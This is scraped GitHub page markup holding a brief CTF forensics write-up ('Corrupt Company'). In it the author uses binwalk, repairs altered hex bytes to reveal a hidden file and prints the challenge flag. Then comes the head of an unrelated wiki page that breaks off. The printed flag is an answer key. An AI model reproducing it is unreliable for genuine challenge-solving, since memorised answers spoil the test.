class="mr-5">Edit this file</div> <div class="color-fg-muted">E</div></button></form> <button aria-label="You must be on a branch to open this file in GitHub Desktop" data-platforms="windows,mac" disabled="disabled" type="submit" data-view-component="true" class="SelectMenu-item no-wrap js-remove-unless-platform btn-invisible btn text-normal"> Open in GitHub Desktop</button> </div> </div> </div> </details></div> <div > </div> <button class="btn-octicon btn-octicon-danger disabled tooltipped tooltipped-nw" disabled aria-label="You must be signed in to make or propose changes" type="button"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-trash"> <path d="M11 1.75V3h2.25a.75.75 0 0 1 0 1.5H2.75a.75.75 0 0 1 0-1.5H5V1.75C5 .784 5.784 0 6.75 0h2.5C10.216 0 11 .784 11 1.75ZM4.496 6.675l.66 6.6a.25.25 0 0 0 .249.225h5.19a.25.25 0 0 0 .249-.225l.66-6.6a.75.75 0 0 1 1.492.149l-.66 6.6A1.748 1.748 0 0 1 10.595 15h-5.19a1.75 1.75 0 0 1-1.741-1.575l-.66-6.6a.75.75 0 1 1 1.492-.15ZM6.5 1.75V3h3V1.75a.25.25 0 0 0-.25-.25h-2.5a.25.25 0 0 0-.25.25Z"></path></svg> </button> </div> </div> <div class="d-flex hide-lg hide-xl flex-order-2 flex-grow-0"> <details class="dropdown details-reset details-overlay d-inline-block"> <summary class="js-blob-dropdown-click btn-octicon p-2" aria-haspopup="true" aria-label="possible actions" data-dropdown-tracking="{"type":"blob_edit_dropdown.more_options_click","context":{"repository_id":475531499,"actor_id":null,"github_dev_enabled":false,"edit_enabled":false,"small_screen":true}}" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> </summary> View raw View blame </details> </div></div> <div id="readme" class="Box-body readme blob js-code-block-container p-5 p-xl-6 gist-border-0"> <article class="markdown-body entry-content container-lg" itemprop="text"><h1 dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Corrupt Company</h1><h2 dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Challenge</h2><h2 dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Solution</h2>Using binwalk, I easily can see that file embed with two fileBut extract this file and turn on ShowHiddenFiles mode, I can't find the "not_important.txt" fileThen, I check Hex from this fileAh shiet, they changed something hereTurn it back to true form and extract again by binwalk, the flag was foundFlag:<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="dctf{pl5_z1p_1t_w3_4r3_4_g00d_c0mp4ny}">dctf{pl5_z1p_1t_w3_4r3_4_g00d_c0mp4ny}</div></article> </div> Using binwalk, I easily can see that file embed with two file But extract this file and turn on ShowHiddenFiles mode, I can't find the "not_important.txt" file Then, I check Hex from this file Ah shiet, they changed something here Turn it back to true form and extract again by binwalk, the flag was found Flag: </div> </readme-toc> <details class="details-reset details-overlay details-overlay-dark" id="jumpto-line-details-dialog"> <summary data-hotkey="l" aria-label="Jump to line"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast linejump overflow-hidden" aria-label="Jump to line"> </option></form><form class="js-jump-to-line-form Box-body d-flex" data-turbo="false" action="" accept-charset="UTF-8" method="get"> <input class="form-control flex-auto mr-3 linejump-input js-jump-to-line-field" type="text" placeholder="Jump to line…" aria-label="Jump to line" autofocus> <button data-close-dialog="" type="submit" data-view-component="true" class="btn"> Go</button></form> </details-dialog> </details> </div> </div> </div> </turbo-frame> </main> </div> </div> <footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2> <div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div> <nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div> <div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template> </div> <div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/wiki-b72b6de22521.css" /> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_clipboard-copy-element_dist_index_esm_js-node_modules_github_remo-8e6bec-232430bfe6da.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_scroll-anchoring_di-e71893-cc1b30c51a28.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_diffs_blob-lines_ts-app_assets_modules_github_diffs_linkable-line-n-f96c66-97aade341120.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/diffs-3a64c1f69a81.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wiki-1423a5c9ebf5.js"></script> <title>PicoCTF : Transposition Trial · not1cyyy/CTF-Writeups Wiki · GitHub</title> <meta name="route-pattern" content="/:user_id/:repository/wiki/:id(.:format)"> <meta name="current-catalog-service-hash" content="27690012a2eb28b75d0bacab0f2c11870266e8db9e019fa71fea812b82397bd6"> <meta name="request-id" content="8142:CDCE:CB9007B:D0F2613:64121B8E" data-pjax-transient="true"/><meta name="html-safe-nonce" content="e9ca86a371833a465544291604e9d7488584e060667876f7fdd9701c725e0b26" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiI4MTQyOkNEQ0U6Q0I5MDA3QjpEMEYyNjEzOjY0MTIxQjhFIiwidmlzaXRvcl9pZCI6IjcxOTY5OTMzMzQyNzA4OTI5NDIiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="a75f47d4b35a6b85a2dfecc2d60c79b4d2b375b101439ce18b0bdab9e98f0098" data-pjax-transient="true"/> <meta name="hovercard-subject-tag" content="repository:481769760" data-turbo-transient> <meta name="github-keyboard-shortcuts" content="repository" data-turbo-transient="true" /> <meta name="selected-link" value="repo_wiki" data-turbo-transient> <meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I"> <meta name="octolytics-url" content="https://collector.github.com/github/collect" /> <meta name="analytics-location" content="/<user-name>/<repo-name>/wiki/show" data-turbo-transient="true" /> <meta name="user-login" content=""> <meta name="viewport" content="width=device-width"> <meta name="description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/e171482900f0c3d46b31f49340e572ecc31e0ee3e562f7133c521eed126b0881/not1cyyy/CTF-Writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="PicoCTF : Transposition Trial" /><meta name="twitter:description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/e171482900f0c3d46b31f49340e572ecc31e0ee3e562f7133c521eed126b0881/not1cyyy/CTF-Writeups" /><meta property="og:image:alt" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="PicoCTF : Transposition Trial" /><meta property="og:url" content="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Transposition-Trial" /><meta property="og:description" content="This is my writeups repository ! . Contribute to not1cyyy/CTF-Writeups development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/"> <meta name="hostname" content="github.com"> <meta name="expected-hostname" content="github.com"> <meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS"> <meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload"> <meta name="turbo-cache-control" content="no-preview" data-turbo-transient=""> <meta name="go-import" content="github.com/not1cyyy/CTF-Writeups git https://github.com/not1cyyy/CTF-Writeups.git"> <meta name="octolytics-dimension-user_id" content="101048320" /><meta name="octolytics-dimension-user_login" content="not1cyyy" /><meta name="octolytics-dimension-repository_id" content="481769760" /><meta name="octolytics-dimension-repository_nwo" content="not1cyyy/CTF-Writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="481769760" /><meta name="octolytics-dimension-repository_network_root_nwo" content="not1cyyy/CTF-Writeups" /> <meta name="turbo-body-classes" content="logged-out env-production page-responsive"> <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats"> <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors"> <meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"> <meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" /> <link rel="manifest" href="/manifest.json" crossOrigin="use-credentials"> </head> <body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button> <div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <div class="flex-1"> Sign up </div> <div class="flex-1 flex-order-2 text-right"> <button 